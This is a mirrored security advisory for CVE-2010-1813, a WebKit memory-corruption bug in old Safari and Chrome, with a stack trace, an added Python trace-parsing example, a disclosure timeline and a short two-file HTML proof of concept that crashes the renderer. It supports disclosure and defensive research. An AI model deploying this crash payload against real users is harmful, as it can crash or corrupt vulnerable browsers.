WebKit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) memory corruption

CVE: CVE-2010-1813
Category: Memory Corruption
Price: Unknown
Severity: High
Author: Unknown
Risk: Critical
Exploitation Type: Remote
Date: 2010-09-14
CPE: cpe:/a:apple:safari:4.1:2d:::
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010090049

Below is a copy:

TITLE: WEBKIT (APPLE SAFARI < 4.1.2/5.0.2 & GOOGLE CHROME < 5.0.375.125) MEMORY CORRUPTION VULNERABILITY
TESTED OS: WINDOWS XP SP3
SEVERITY: HIGH
CVE-NUMBER: CVE-2010-1813
DISCOVERED DATE: 2010-06-29
FIXED DATE: GOOGLE CHROME (2010-07-26) & APPLE SAFARI (2010-09-08)
FIXED VERSIONS: GOOGLE CHROME 5.0.375.125 & APPLE SAFARI 4.1.2/5.0.2
DISCOVERED BY: JOSE A. VAZQUEZ
 
======ABOUT APPLICATION======
 
"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version
of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and
JavaScript code began as a branch of the KHTML and KJS libraries from KDE..." copied from http://webkit.org/
 
======DESCRIPTION======
 
A memory corruption vulnerability was confirmed by the Chromium Security Team. The original stack trace showed a
null pointer dereference, but other pointers were also found corrupted, which is why the issue was treated as
memory corruption rather than as a benign null dereference. The crash occurs while painting: the refresh loop in
the proof of concept repeatedly repaints the frame, and the crash is reached from
RenderBlock::paintContinuationOutlines() calling RenderObject::containingBlock().
 
Stacktrace (using Chrome symbols):
 
WebCore::RenderObject::containingBlock()  Line 597
WebCore::RenderBlock::paintContinuationOutlines()  Line 2344
WebCore::RenderBlock::paintObject()  Line 2232
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2447
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebCore::RenderWidget::paint()  Line 281
WebCore::InlineBox::paint()  Line 180
WebCore::InlineFlowBox::paint()  Line 682
WebCore::RootInlineBox::paint()  Line 167
WebCore::RenderLineBoxList::paint()  Line 219
WebCore::RenderBlock::paintContents()  Line 2090
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderBlock::paintChildren()  Line 2127
WebCore::RenderBlock::paintContents()  Line 2092
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2445
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebKit::WebFrameImpl::paintWithContext()  Line 1795
WebKit::WebFrameImpl::paint()  Line 1818
WebKit::WebViewImpl::paint()  Line 979
RenderWidget::PaintRect()  Line 390
RenderWidget::DoDeferredUpdate()  Line 501
RenderWidget::CallDoDeferredUpdate()  Line 428
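When triaging many reports of this kind it helps to parse the symbolised trace rather than read it by eye. The parser below is an added editorial example, not the researcher's code and not part of the original advisory; it reads the exact "Symbol()  Line N" format shown above (the trace text embedded in it is copied from the advisory), extracts the crashing frame and its caller, and reports whether the crash was reached through the painting code path and where control entered WebCore from the embedder. The summary fields it produces are this example's own naming, not any tool's output format.

```python
"""Parse and summarise a WebKit/Chrome stack trace in the advisory's format.

Added editorial example; not the researcher's code. The trace text is copied
from the advisory above and is the sample input for the parser.
"""
import re
from dataclasses import dataclass

# One frame per line: "<Namespace>::<Class>::<method>()  Line <n>"
FRAME_RE = re.compile(r"^\s*(?P<symbol>[\w:~<>]+)\(\)\s+Line\s+(?P<line>\d+)\s*$")

ADVISORY_TRACE = """
WebCore::RenderObject::containingBlock()  Line 597
WebCore::RenderBlock::paintContinuationOutlines()  Line 2344
WebCore::RenderBlock::paintObject()  Line 2232
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2447
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebCore::RenderWidget::paint()  Line 281
WebCore::InlineBox::paint()  Line 180
WebCore::InlineFlowBox::paint()  Line 682
WebCore::RootInlineBox::paint()  Line 167
WebCore::RenderLineBoxList::paint()  Line 219
WebCore::RenderBlock::paintContents()  Line 2090
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderBlock::paintChildren()  Line 2127
WebCore::RenderBlock::paintContents()  Line 2092
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2445
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebKit::WebFrameImpl::paintWithContext()  Line 1795
WebKit::WebFrameImpl::paint()  Line 1818
WebKit::WebViewImpl::paint()  Line 979
RenderWidget::PaintRect()  Line 390
RenderWidget::DoDeferredUpdate()  Line 501
RenderWidget::CallDoDeferredUpdate()  Line 428
"""


@dataclass(frozen=True)
class Frame:
    symbol: str
    line: int

    @property
    def namespace(self) -> str:
        # "WebCore::RenderBlock::paint" -> "WebCore". Chrome-side frames such
        # as "RenderWidget::PaintRect" carry no namespace prefix.
        parts = self.symbol.split("::")
        return parts[0] if len(parts) > 2 else ""

    @property
    def function(self) -> str:
        return self.symbol.rsplit("::", 1)[-1]


def parse_trace(text: str) -> list:
    """Return the frames innermost-first; reject lines that are not frames."""
    frames = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        m = FRAME_RE.match(raw)
        if m is None:
            raise ValueError(f"line {lineno}: not a frame: {raw!r}")
        frames.append(Frame(m.group("symbol"), int(m.group("line"))))
    return frames


def triage(frames: list) -> dict:
    """Summarise a parsed trace: crash site, caller, paint-path involvement."""
    if not frames:
        raise ValueError("empty trace")
    top = frames[0]
    # Frames whose function name contains "paint": a crash reached through
    # them happened during repaint, which is what the refresh loop drives.
    paint_frames = [f for f in frames if "paint" in f.function.lower()]
    # First frame outside WebCore, i.e. where the engine was entered from
    # the embedder (WebKit glue or Chrome's RenderWidget).
    idx = next((i for i, f in enumerate(frames) if f.namespace != "WebCore"), None)
    return {
        "crash_symbol": top.symbol,
        "crash_line": top.line,
        "caller": frames[1].symbol if len(frames) > 1 else None,
        "depth": len(frames),
        "paint_frames": len(paint_frames),
        "in_paint_path": bool(paint_frames),
        "first_non_webcore_frame": frames[idx].symbol if idx is not None else None,
        "namespaces": sorted({f.namespace or "<global>" for f in frames}),
    }


if __name__ == "__main__":
    for key, value in triage(parse_trace(ADVISORY_TRACE)).items():
        print(f"{key}: {value}")
```

Run against the advisory's trace it reports the crash at WebCore::RenderObject::containingBlock line 597, called from RenderBlock::paintContinuationOutlines, 34 frames deep with 31 paint-related frames, and WebKit::WebFrameImpl::paintWithContext as the point where control entered WebCore from the embedder.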
 
 
======PROOF OF CONCEPT======
 
File 1.html:
 
<meta http-equiv="refresh" content="1;URL=1.html" >
<iframe src="2.html"></iframe>
 
File 2.html:
 
<dialog style='position:relative'>
 <h style='outline-style:auto'>X<div></div></h>
</dialog>
 
 
======STEPS TO REPRODUCE======
 
1.- Upload 1.html and 2.html to your server.
2.- Open 1.html with the vulnerable application.
 
-Google Chrome:
 
3.- Wait a while; the renderer crashes (sad tab).
 
-Apple Safari:
 
3.- Wait a while; if the crash does not occur on its own, press Ctrl+T (open a new tab) to force a repaint and trigger it.
  
 
 
======REFERENCES======
 
[ref-1] -> https://bugs.webkit.org/show_bug.cgi?id=41373
[ref-2] -> http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html
[ref-3] -> http://support.apple.com/kb/HT4334
[ref-4] -> http://spa-s3c.blogspot.com/2010/09/full-responsible-disclosurewebkit-apple.html
 
 
======DISCLOSURE TIMELINE======
 
Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)
 
[2010-06-29] => Posted new issue in Chromium Project (with pocs).
[2010-06-29] => Chromium confirmed memory corruption and opened new webkit bug.
[2010-07-26] => Chromium released new fix (Google Chrome 5.0.375.125).
[2010-09-08] => Apple released new fix (Apple Safari 4.1.2/5.0.2).
[2010-09-10] => Public disclosure.
 
 
======CREDITS=======
 
Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/

Copyright ©2024 Exploitalert.